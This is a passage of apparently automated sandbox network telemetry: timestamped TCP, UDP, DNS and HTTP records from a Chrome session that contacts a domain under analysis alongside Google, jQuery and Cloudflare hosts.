Mar 25, 2025 19:33:54.028532028 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.028568983 CET	49693	443	192.168.2.7	104.21.65.232
Mar 25, 2025 19:33:54.028588057 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.028600931 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.028609037 CET	49693	443	192.168.2.7	104.21.65.232
Mar 25, 2025 19:33:54.028620958 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.028624058 CET	49693	443	192.168.2.7	104.21.65.232
Mar 25, 2025 19:33:54.028634071 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.028659105 CET	49693	443	192.168.2.7	104.21.65.232
Mar 25, 2025 19:33:54.028682947 CET	49693	443	192.168.2.7	104.21.65.232
Mar 25, 2025 19:33:54.030240059 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.030252934 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.030308008 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.030320883 CET	49693	443	192.168.2.7	104.21.65.232
Mar 25, 2025 19:33:54.030330896 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.030345917 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.030359983 CET	49693	443	192.168.2.7	104.21.65.232
Mar 25, 2025 19:33:54.030409098 CET	49693	443	192.168.2.7	104.21.65.232
Mar 25, 2025 19:33:54.030411005 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.030421019 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.030436039 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.030457020 CET	49693	443	192.168.2.7	104.21.65.232
Mar 25, 2025 19:33:54.030462027 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.030484915 CET	49693	443	192.168.2.7	104.21.65.232
Mar 25, 2025 19:33:54.030502081 CET	49693	443	192.168.2.7	104.21.65.232
Mar 25, 2025 19:33:54.038424969 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.038444996 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.038506031 CET	49693	443	192.168.2.7	104.21.65.232
Mar 25, 2025 19:33:54.038506031 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.038516998 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.038532019 CET	49693	443	192.168.2.7	104.21.65.232
Mar 25, 2025 19:33:54.038538933 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.038549900 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.038553953 CET	49693	443	192.168.2.7	104.21.65.232
Mar 25, 2025 19:33:54.038562059 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.038573980 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.038583994 CET	49693	443	192.168.2.7	104.21.65.232
Mar 25, 2025 19:33:54.038625002 CET	49693	443	192.168.2.7	104.21.65.232
Mar 25, 2025 19:33:54.038630009 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.038639069 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.038659096 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.038681984 CET	49693	443	192.168.2.7	104.21.65.232
Mar 25, 2025 19:33:54.038686037 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.038700104 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.038712025 CET	49693	443	192.168.2.7	104.21.65.232
Mar 25, 2025 19:33:54.038752079 CET	49693	443	192.168.2.7	104.21.65.232
Mar 25, 2025 19:33:54.038757086 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.038767099 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.038784981 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.038800001 CET	49693	443	192.168.2.7	104.21.65.232
Mar 25, 2025 19:33:54.038804054 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.038831949 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.038845062 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.038851023 CET	49693	443	192.168.2.7	104.21.65.232
Mar 25, 2025 19:33:54.038856030 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.038875103 CET	49693	443	192.168.2.7	104.21.65.232
Mar 25, 2025 19:33:54.038885117 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.038903952 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.038908005 CET	49693	443	192.168.2.7	104.21.65.232
Mar 25, 2025 19:33:54.038916111 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.038932085 CET	49693	443	192.168.2.7	104.21.65.232
Mar 25, 2025 19:33:54.038937092 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.038952112 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.038959026 CET	49693	443	192.168.2.7	104.21.65.232
Mar 25, 2025 19:33:54.038963079 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.038981915 CET	49693	443	192.168.2.7	104.21.65.232
Mar 25, 2025 19:33:54.039015055 CET	49693	443	192.168.2.7	104.21.65.232
Mar 25, 2025 19:33:54.039019108 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.039026976 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.039043903 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.039052010 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.039072037 CET	49693	443	192.168.2.7	104.21.65.232
Mar 25, 2025 19:33:54.039076090 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.039103031 CET	49693	443	192.168.2.7	104.21.65.232
Mar 25, 2025 19:33:54.039109945 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.039128065 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.039134979 CET	49693	443	192.168.2.7	104.21.65.232
Mar 25, 2025 19:33:54.039139032 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.039175034 CET	49693	443	192.168.2.7	104.21.65.232
Mar 25, 2025 19:33:54.039202929 CET	49693	443	192.168.2.7	104.21.65.232
Mar 25, 2025 19:33:54.039660931 CET	49693	443	192.168.2.7	104.21.65.232
Mar 25, 2025 19:33:54.060322046 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.060334921 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.060374975 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.060389042 CET	49693	443	192.168.2.7	104.21.65.232
Mar 25, 2025 19:33:54.060395956 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.060434103 CET	49693	443	192.168.2.7	104.21.65.232
Mar 25, 2025 19:33:54.060467005 CET	49693	443	192.168.2.7	104.21.65.232
Mar 25, 2025 19:33:54.060472012 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.060482025 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.060506105 CET	49693	443	192.168.2.7	104.21.65.232
Mar 25, 2025 19:33:54.060535908 CET	49693	443	192.168.2.7	104.21.65.232
Mar 25, 2025 19:33:54.060811996 CET	49693	443	192.168.2.7	104.21.65.232
Mar 25, 2025 19:33:54.060822964 CET	443	49693	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:54.196670055 CET	49695	443	192.168.2.7	151.101.194.137
Mar 25, 2025 19:33:54.196748972 CET	443	49695	151.101.194.137	192.168.2.7
Mar 25, 2025 19:33:54.196813107 CET	49695	443	192.168.2.7	151.101.194.137
Mar 25, 2025 19:33:54.197024107 CET	49695	443	192.168.2.7	151.101.194.137
Mar 25, 2025 19:33:54.197058916 CET	443	49695	151.101.194.137	192.168.2.7
Mar 25, 2025 19:33:54.409703016 CET	443	49695	151.101.194.137	192.168.2.7
Mar 25, 2025 19:33:54.409802914 CET	49695	443	192.168.2.7	151.101.194.137
Mar 25, 2025 19:33:54.411432028 CET	49695	443	192.168.2.7	151.101.194.137
Mar 25, 2025 19:33:54.411463976 CET	443	49695	151.101.194.137	192.168.2.7
Mar 25, 2025 19:33:54.411784887 CET	443	49695	151.101.194.137	192.168.2.7
Mar 25, 2025 19:33:54.412260056 CET	49695	443	192.168.2.7	151.101.194.137
Mar 25, 2025 19:33:54.456274986 CET	443	49695	151.101.194.137	192.168.2.7
Mar 25, 2025 19:33:54.596211910 CET	443	49695	151.101.194.137	192.168.2.7
Mar 25, 2025 19:33:54.641906977 CET	49695	443	192.168.2.7	151.101.194.137
Mar 25, 2025 19:33:54.717943907 CET	443	49695	151.101.194.137	192.168.2.7
Mar 25, 2025 19:33:54.717999935 CET	443	49695	151.101.194.137	192.168.2.7
Mar 25, 2025 19:33:54.718030930 CET	49695	443	192.168.2.7	151.101.194.137
Mar 25, 2025 19:33:54.718055010 CET	443	49695	151.101.194.137	192.168.2.7
Mar 25, 2025 19:33:54.718060970 CET	49695	443	192.168.2.7	151.101.194.137
Mar 25, 2025 19:33:54.718090057 CET	443	49695	151.101.194.137	192.168.2.7
Mar 25, 2025 19:33:54.718110085 CET	443	49695	151.101.194.137	192.168.2.7
Mar 25, 2025 19:33:54.718112946 CET	49695	443	192.168.2.7	151.101.194.137
Mar 25, 2025 19:33:54.718137980 CET	49695	443	192.168.2.7	151.101.194.137
Mar 25, 2025 19:33:54.718158960 CET	49695	443	192.168.2.7	151.101.194.137
Mar 25, 2025 19:33:54.721402884 CET	443	49695	151.101.194.137	192.168.2.7
Mar 25, 2025 19:33:54.721455097 CET	443	49695	151.101.194.137	192.168.2.7
Mar 25, 2025 19:33:54.721513987 CET	49695	443	192.168.2.7	151.101.194.137
Mar 25, 2025 19:33:54.721533060 CET	443	49695	151.101.194.137	192.168.2.7
Mar 25, 2025 19:33:54.721585989 CET	443	49695	151.101.194.137	192.168.2.7
Mar 25, 2025 19:33:54.721586943 CET	49695	443	192.168.2.7	151.101.194.137
Mar 25, 2025 19:33:54.721586943 CET	49695	443	192.168.2.7	151.101.194.137
Mar 25, 2025 19:33:54.721613884 CET	443	49695	151.101.194.137	192.168.2.7
Mar 25, 2025 19:33:54.721649885 CET	49695	443	192.168.2.7	151.101.194.137
Mar 25, 2025 19:33:54.721664906 CET	443	49695	151.101.194.137	192.168.2.7
Mar 25, 2025 19:33:54.721669912 CET	49695	443	192.168.2.7	151.101.194.137
Mar 25, 2025 19:33:54.721692085 CET	443	49695	151.101.194.137	192.168.2.7
Mar 25, 2025 19:33:54.721729040 CET	49695	443	192.168.2.7	151.101.194.137
Mar 25, 2025 19:33:54.721754074 CET	49695	443	192.168.2.7	151.101.194.137
Mar 25, 2025 19:33:54.737968922 CET	443	49695	151.101.194.137	192.168.2.7
Mar 25, 2025 19:33:54.738013983 CET	443	49695	151.101.194.137	192.168.2.7
Mar 25, 2025 19:33:54.738038063 CET	49695	443	192.168.2.7	151.101.194.137
Mar 25, 2025 19:33:54.738055944 CET	443	49695	151.101.194.137	192.168.2.7
Mar 25, 2025 19:33:54.738081932 CET	49695	443	192.168.2.7	151.101.194.137
Mar 25, 2025 19:33:54.738099098 CET	49695	443	192.168.2.7	151.101.194.137
Mar 25, 2025 19:33:54.962673903 CET	443	49695	151.101.194.137	192.168.2.7
Mar 25, 2025 19:33:54.962744951 CET	443	49695	151.101.194.137	192.168.2.7
Mar 25, 2025 19:33:54.962778091 CET	49695	443	192.168.2.7	151.101.194.137
Mar 25, 2025 19:33:54.962821007 CET	443	49695	151.101.194.137	192.168.2.7
Mar 25, 2025 19:33:54.962836981 CET	49695	443	192.168.2.7	151.101.194.137
Mar 25, 2025 19:33:54.962857962 CET	49695	443	192.168.2.7	151.101.194.137
Mar 25, 2025 19:33:55.075254917 CET	443	49695	151.101.194.137	192.168.2.7
Mar 25, 2025 19:33:55.075335979 CET	443	49695	151.101.194.137	192.168.2.7
Mar 25, 2025 19:33:55.075335979 CET	49695	443	192.168.2.7	151.101.194.137
Mar 25, 2025 19:33:55.075409889 CET	49695	443	192.168.2.7	151.101.194.137
Mar 25, 2025 19:33:55.356857061 CET	49695	443	192.168.2.7	151.101.194.137
Mar 25, 2025 19:33:55.356916904 CET	443	49695	151.101.194.137	192.168.2.7
Mar 25, 2025 19:33:55.446327925 CET	49692	443	192.168.2.7	104.21.65.232
Mar 25, 2025 19:33:55.492273092 CET	443	49692	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:55.846374035 CET	443	49692	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:55.846442938 CET	443	49692	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:55.846604109 CET	49692	443	192.168.2.7	104.21.65.232
Mar 25, 2025 19:33:55.848452091 CET	49692	443	192.168.2.7	104.21.65.232
Mar 25, 2025 19:33:55.848468065 CET	443	49692	104.21.65.232	192.168.2.7
Mar 25, 2025 19:33:55.954785109 CET	49701	443	192.168.2.7	35.190.80.1
Mar 25, 2025 19:33:55.954804897 CET	443	49701	35.190.80.1	192.168.2.7
Mar 25, 2025 19:33:55.955076933 CET	49701	443	192.168.2.7	35.190.80.1
Mar 25, 2025 19:33:55.955235004 CET	49701	443	192.168.2.7	35.190.80.1
Mar 25, 2025 19:33:55.955239058 CET	443	49701	35.190.80.1	192.168.2.7
Mar 25, 2025 19:33:56.582729101 CET	443	49701	35.190.80.1	192.168.2.7
Mar 25, 2025 19:33:56.582791090 CET	49701	443	192.168.2.7	35.190.80.1
Mar 25, 2025 19:33:56.584007978 CET	49701	443	192.168.2.7	35.190.80.1
Mar 25, 2025 19:33:56.584012985 CET	443	49701	35.190.80.1	192.168.2.7
Mar 25, 2025 19:33:56.584263086 CET	443	49701	35.190.80.1	192.168.2.7
Mar 25, 2025 19:33:56.584544897 CET	49701	443	192.168.2.7	35.190.80.1
Mar 25, 2025 19:33:56.632271051 CET	443	49701	35.190.80.1	192.168.2.7
Mar 25, 2025 19:33:56.813843012 CET	443	49701	35.190.80.1	192.168.2.7
Mar 25, 2025 19:33:56.813905001 CET	443	49701	35.190.80.1	192.168.2.7
Mar 25, 2025 19:33:56.813949108 CET	49701	443	192.168.2.7	35.190.80.1
Mar 25, 2025 19:33:56.814172029 CET	49701	443	192.168.2.7	35.190.80.1
Mar 25, 2025 19:33:56.814183950 CET	443	49701	35.190.80.1	192.168.2.7
Mar 25, 2025 19:33:56.815040112 CET	49702	443	192.168.2.7	35.190.80.1
Mar 25, 2025 19:33:56.815063000 CET	443	49702	35.190.80.1	192.168.2.7
Mar 25, 2025 19:33:56.815200090 CET	49702	443	192.168.2.7	35.190.80.1
Mar 25, 2025 19:33:56.815268040 CET	49702	443	192.168.2.7	35.190.80.1
Mar 25, 2025 19:33:56.815274954 CET	443	49702	35.190.80.1	192.168.2.7
Mar 25, 2025 19:33:57.019946098 CET	443	49702	35.190.80.1	192.168.2.7
Mar 25, 2025 19:33:57.020210981 CET	49702	443	192.168.2.7	35.190.80.1
Mar 25, 2025 19:33:57.020243883 CET	443	49702	35.190.80.1	192.168.2.7
Mar 25, 2025 19:33:57.020507097 CET	49702	443	192.168.2.7	35.190.80.1
Mar 25, 2025 19:33:57.020513058 CET	443	49702	35.190.80.1	192.168.2.7
Mar 25, 2025 19:33:57.255944014 CET	443	49702	35.190.80.1	192.168.2.7
Mar 25, 2025 19:33:57.256035089 CET	443	49702	35.190.80.1	192.168.2.7
Mar 25, 2025 19:33:57.256469011 CET	49702	443	192.168.2.7	35.190.80.1
Mar 25, 2025 19:33:57.256469011 CET	49702	443	192.168.2.7	35.190.80.1
Mar 25, 2025 19:33:57.256483078 CET	443	49702	35.190.80.1	192.168.2.7
Mar 25, 2025 19:33:57.256553888 CET	49702	443	192.168.2.7	35.190.80.1
Mar 25, 2025 19:34:01.358825922 CET	443	49691	142.250.81.228	192.168.2.7
Mar 25, 2025 19:34:01.358876944 CET	443	49691	142.250.81.228	192.168.2.7
Mar 25, 2025 19:34:01.358958960 CET	49691	443	192.168.2.7	142.250.81.228
Mar 25, 2025 19:34:01.749949932 CET	49705	80	192.168.2.7	142.251.40.227
Mar 25, 2025 19:34:01.847621918 CET	80	49705	142.251.40.227	192.168.2.7
Mar 25, 2025 19:34:01.847739935 CET	49705	80	192.168.2.7	142.251.40.227
Mar 25, 2025 19:34:01.847958088 CET	49705	80	192.168.2.7	142.251.40.227
Mar 25, 2025 19:34:01.945272923 CET	80	49705	142.251.40.227	192.168.2.7
Mar 25, 2025 19:34:01.945822001 CET	80	49705	142.251.40.227	192.168.2.7
Mar 25, 2025 19:34:01.952363968 CET	49705	80	192.168.2.7	142.251.40.227
Mar 25, 2025 19:34:01.985022068 CET	49691	443	192.168.2.7	142.250.81.228
Mar 25, 2025 19:34:01.985044956 CET	443	49691	142.250.81.228	192.168.2.7
Mar 25, 2025 19:34:02.051050901 CET	80	49705	142.251.40.227	192.168.2.7
Mar 25, 2025 19:34:02.091898918 CET	49705	80	192.168.2.7	142.251.40.227
Mar 25, 2025 19:34:02.547256947 CET	49672	443	192.168.2.7	2.23.227.208
Mar 25, 2025 19:34:02.547283888 CET	443	49672	2.23.227.208	192.168.2.7
Mar 25, 2025 19:34:06.779584885 CET	49671	443	192.168.2.7	204.79.197.203
Mar 25, 2025 19:34:07.091686010 CET	49671	443	192.168.2.7	204.79.197.203
Mar 25, 2025 19:34:07.693490982 CET	49671	443	192.168.2.7	204.79.197.203
Mar 25, 2025 19:34:08.904536963 CET	49671	443	192.168.2.7	204.79.197.203
Mar 25, 2025 19:34:11.311245918 CET	49671	443	192.168.2.7	204.79.197.203
Mar 25, 2025 19:34:15.327157021 CET	49678	443	192.168.2.7	20.189.173.15
Mar 25, 2025 19:34:15.638143063 CET	49678	443	192.168.2.7	20.189.173.15
Mar 25, 2025 19:34:16.123153925 CET	49671	443	192.168.2.7	204.79.197.203
Mar 25, 2025 19:34:16.248045921 CET	49678	443	192.168.2.7	20.189.173.15
Mar 25, 2025 19:34:17.451592922 CET	49678	443	192.168.2.7	20.189.173.15
Mar 25, 2025 19:34:19.857526064 CET	49678	443	192.168.2.7	20.189.173.15
Mar 25, 2025 19:34:24.670598030 CET	49678	443	192.168.2.7	20.189.173.15
Mar 25, 2025 19:34:25.732855082 CET	49671	443	192.168.2.7	204.79.197.203
Mar 25, 2025 19:34:34.279788971 CET	49678	443	192.168.2.7	20.189.173.15
Mar 25, 2025 19:34:51.093894005 CET	49717	443	192.168.2.7	142.250.81.228
Mar 25, 2025 19:34:51.093938112 CET	443	49717	142.250.81.228	192.168.2.7
Mar 25, 2025 19:34:51.094377995 CET	49717	443	192.168.2.7	142.250.81.228
Mar 25, 2025 19:34:51.094544888 CET	49717	443	192.168.2.7	142.250.81.228
Mar 25, 2025 19:34:51.094557047 CET	443	49717	142.250.81.228	192.168.2.7
Mar 25, 2025 19:34:51.315215111 CET	443	49717	142.250.81.228	192.168.2.7
Mar 25, 2025 19:34:51.315516949 CET	49717	443	192.168.2.7	142.250.81.228
Mar 25, 2025 19:34:51.315565109 CET	443	49717	142.250.81.228	192.168.2.7
Mar 25, 2025 19:35:01.305629015 CET	443	49717	142.250.81.228	192.168.2.7
Mar 25, 2025 19:35:01.305768967 CET	443	49717	142.250.81.228	192.168.2.7
Mar 25, 2025 19:35:01.305836916 CET	49717	443	192.168.2.7	142.250.81.228
Mar 25, 2025 19:35:01.984987020 CET	49717	443	192.168.2.7	142.250.81.228
Mar 25, 2025 19:35:01.985006094 CET	443	49717	142.250.81.228	192.168.2.7
Mar 25, 2025 19:35:02.264108896 CET	49705	80	192.168.2.7	142.251.40.227
Mar 25, 2025 19:35:02.363497972 CET	80	49705	142.251.40.227	192.168.2.7
Mar 25, 2025 19:35:02.363625050 CET	49705	80	192.168.2.7	142.251.40.227
Mar 25, 2025 19:35:51.157784939 CET	49722	443	192.168.2.7	142.250.81.228
Mar 25, 2025 19:35:51.157838106 CET	443	49722	142.250.81.228	192.168.2.7
Mar 25, 2025 19:35:51.157927990 CET	49722	443	192.168.2.7	142.250.81.228
Mar 25, 2025 19:35:51.158202887 CET	49722	443	192.168.2.7	142.250.81.228
Mar 25, 2025 19:35:51.158216953 CET	443	49722	142.250.81.228	192.168.2.7
Mar 25, 2025 19:35:51.667332888 CET	443	49722	142.250.81.228	192.168.2.7
Mar 25, 2025 19:35:51.667825937 CET	49722	443	192.168.2.7	142.250.81.228
Mar 25, 2025 19:35:51.667853117 CET	443	49722	142.250.81.228	192.168.2.7
Mar 25, 2025 19:36:01.666059971 CET	443	49722	142.250.81.228	192.168.2.7
Mar 25, 2025 19:36:01.666142941 CET	443	49722	142.250.81.228	192.168.2.7
Mar 25, 2025 19:36:01.666332960 CET	49722	443	192.168.2.7	142.250.81.228
Mar 25, 2025 19:36:01.890949011 CET	49722	443	192.168.2.7	142.250.81.228
Mar 25, 2025 19:36:01.890965939 CET	443	49722	142.250.81.228	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 25, 2025 19:33:46.592751980 CET	53	54421	1.1.1.1	192.168.2.7
Mar 25, 2025 19:33:46.856584072 CET	53	49399	1.1.1.1	192.168.2.7
Mar 25, 2025 19:33:47.545960903 CET	53	63929	1.1.1.1	192.168.2.7
Mar 25, 2025 19:33:48.097109079 CET	53	63218	1.1.1.1	192.168.2.7
Mar 25, 2025 19:33:51.032300949 CET	51508	53	192.168.2.7	1.1.1.1
Mar 25, 2025 19:33:51.032423019 CET	58047	53	192.168.2.7	1.1.1.1
Mar 25, 2025 19:33:51.140475988 CET	53	51508	1.1.1.1	192.168.2.7
Mar 25, 2025 19:33:51.140489101 CET	53	58047	1.1.1.1	192.168.2.7
Mar 25, 2025 19:33:52.256921053 CET	54641	53	192.168.2.7	1.1.1.1
Mar 25, 2025 19:33:52.257910013 CET	51361	53	192.168.2.7	1.1.1.1
Mar 25, 2025 19:33:52.372361898 CET	53	54641	1.1.1.1	192.168.2.7
Mar 25, 2025 19:33:52.380738974 CET	53	51361	1.1.1.1	192.168.2.7
Mar 25, 2025 19:33:54.090657949 CET	62822	53	192.168.2.7	1.1.1.1
Mar 25, 2025 19:33:54.090785027 CET	58936	53	192.168.2.7	1.1.1.1
Mar 25, 2025 19:33:54.195633888 CET	53	62822	1.1.1.1	192.168.2.7
Mar 25, 2025 19:33:54.196080923 CET	53	58936	1.1.1.1	192.168.2.7
Mar 25, 2025 19:33:55.538614035 CET	53	55342	1.1.1.1	192.168.2.7
Mar 25, 2025 19:33:55.847951889 CET	52619	53	192.168.2.7	1.1.1.1
Mar 25, 2025 19:33:55.848099947 CET	56003	53	192.168.2.7	1.1.1.1
Mar 25, 2025 19:33:55.952728033 CET	53	56003	1.1.1.1	192.168.2.7
Mar 25, 2025 19:33:55.953113079 CET	53	52619	1.1.1.1	192.168.2.7
Mar 25, 2025 19:34:05.155738115 CET	53	65389	1.1.1.1	192.168.2.7
Mar 25, 2025 19:34:24.136810064 CET	53	49754	1.1.1.1	192.168.2.7
Mar 25, 2025 19:34:46.346755028 CET	53	53794	1.1.1.1	192.168.2.7
Mar 25, 2025 19:34:47.183918953 CET	53	59639	1.1.1.1	192.168.2.7
Mar 25, 2025 19:34:49.747750044 CET	53	58288	1.1.1.1	192.168.2.7
Mar 25, 2025 19:35:12.072264910 CET	138	138	192.168.2.7	192.168.2.255
Mar 25, 2025 19:35:17.474711895 CET	53	59423	1.1.1.1	192.168.2.7
Mar 25, 2025 19:36:02.002152920 CET	53	58990	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 25, 2025 19:33:51.032300949 CET	192.168.2.7	1.1.1.1	0xff1b	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Mar 25, 2025 19:33:51.032423019 CET	192.168.2.7	1.1.1.1	0x601a	Standard query (0)	www.google.com	65	IN (0x0001)	false
Mar 25, 2025 19:33:52.256921053 CET	192.168.2.7	1.1.1.1	0xca92	Standard query (0)	zak9.rnltvipi.es	A (IP address)	IN (0x0001)	false
Mar 25, 2025 19:33:52.257910013 CET	192.168.2.7	1.1.1.1	0xc076	Standard query (0)	zak9.rnltvipi.es	65	IN (0x0001)	false
Mar 25, 2025 19:33:54.090657949 CET	192.168.2.7	1.1.1.1	0x97c3	Standard query (0)	code.jquery.com	A (IP address)	IN (0x0001)	false
Mar 25, 2025 19:33:54.090785027 CET	192.168.2.7	1.1.1.1	0x3fe1	Standard query (0)	code.jquery.com	65	IN (0x0001)	false
Mar 25, 2025 19:33:55.847951889 CET	192.168.2.7	1.1.1.1	0x1cdd	Standard query (0)	a.nel.cloudflare.com	A (IP address)	IN (0x0001)	false
Mar 25, 2025 19:33:55.848099947 CET	192.168.2.7	1.1.1.1	0xc5b6	Standard query (0)	a.nel.cloudflare.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Mar 25, 2025 19:33:51.140475988 CET	1.1.1.1	192.168.2.7	0xff1b	No error (0)	www.google.com	142.250.81.228	A (IP address)	IN (0x0001)	false
Mar 25, 2025 19:33:51.140489101 CET	1.1.1.1	192.168.2.7	0x601a	No error (0)	www.google.com		65	IN (0x0001)	false
Mar 25, 2025 19:33:52.372361898 CET	1.1.1.1	192.168.2.7	0xca92	No error (0)	zak9.rnltvipi.es	104.21.65.232	A (IP address)	IN (0x0001)	false
Mar 25, 2025 19:33:52.372361898 CET	1.1.1.1	192.168.2.7	0xca92	No error (0)	zak9.rnltvipi.es	172.67.194.65	A (IP address)	IN (0x0001)	false
Mar 25, 2025 19:33:52.380738974 CET	1.1.1.1	192.168.2.7	0xc076	No error (0)	zak9.rnltvipi.es		65	IN (0x0001)	false
Mar 25, 2025 19:33:54.195633888 CET	1.1.1.1	192.168.2.7	0x97c3	No error (0)	code.jquery.com	151.101.194.137	A (IP address)	IN (0x0001)	false
Mar 25, 2025 19:33:54.195633888 CET	1.1.1.1	192.168.2.7	0x97c3	No error (0)	code.jquery.com	151.101.66.137	A (IP address)	IN (0x0001)	false
Mar 25, 2025 19:33:54.195633888 CET	1.1.1.1	192.168.2.7	0x97c3	No error (0)	code.jquery.com	151.101.130.137	A (IP address)	IN (0x0001)	false
Mar 25, 2025 19:33:54.195633888 CET	1.1.1.1	192.168.2.7	0x97c3	No error (0)	code.jquery.com	151.101.2.137	A (IP address)	IN (0x0001)	false
Mar 25, 2025 19:33:55.953113079 CET	1.1.1.1	192.168.2.7	0x1cdd	No error (0)	a.nel.cloudflare.com	35.190.80.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

zak9.rnltvipi.es

code.jquery.com

a.nel.cloudflare.com

c.pki.goog

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.7	49705	142.251.40.227	80

Timestamp	Bytes transferred	Direction	Data
Mar 25, 2025 19:34:01.847958088 CET	202	OUT	GET /r/gsr1.crl HTTP/1.1 Cache-Control: max-age = 3000 Connection: Keep-Alive Accept: / If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMT User-Agent: Microsoft-CryptoAPI/10.0 Host: c.pki.goog
Mar 25, 2025 19:34:01.945822001 CET	223	IN	HTTP/1.1 304 Not Modified Date: Tue, 25 Mar 2025 17:53:27 GMT Expires: Tue, 25 Mar 2025 18:43:27 GMT Age: 2434 Last-Modified: Tue, 07 Jan 2025 07:28:00 GMT Cache-Control: public, max-age=3000 Vary: Accept-Encoding
Mar 25, 2025 19:34:01.952363968 CET	200	OUT	GET /r/r4.crl HTTP/1.1 Cache-Control: max-age = 3000 Connection: Keep-Alive Accept: / If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT User-Agent: Microsoft-CryptoAPI/10.0 Host: c.pki.goog
Mar 25, 2025 19:34:02.051050901 CET	223	IN	HTTP/1.1 304 Not Modified Date: Tue, 25 Mar 2025 17:53:30 GMT Expires: Tue, 25 Mar 2025 18:43:30 GMT Age: 2432 Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT Cache-Control: public, max-age=3000 Vary: Accept-Encoding

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49693	104.21.65.232	443	4376	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
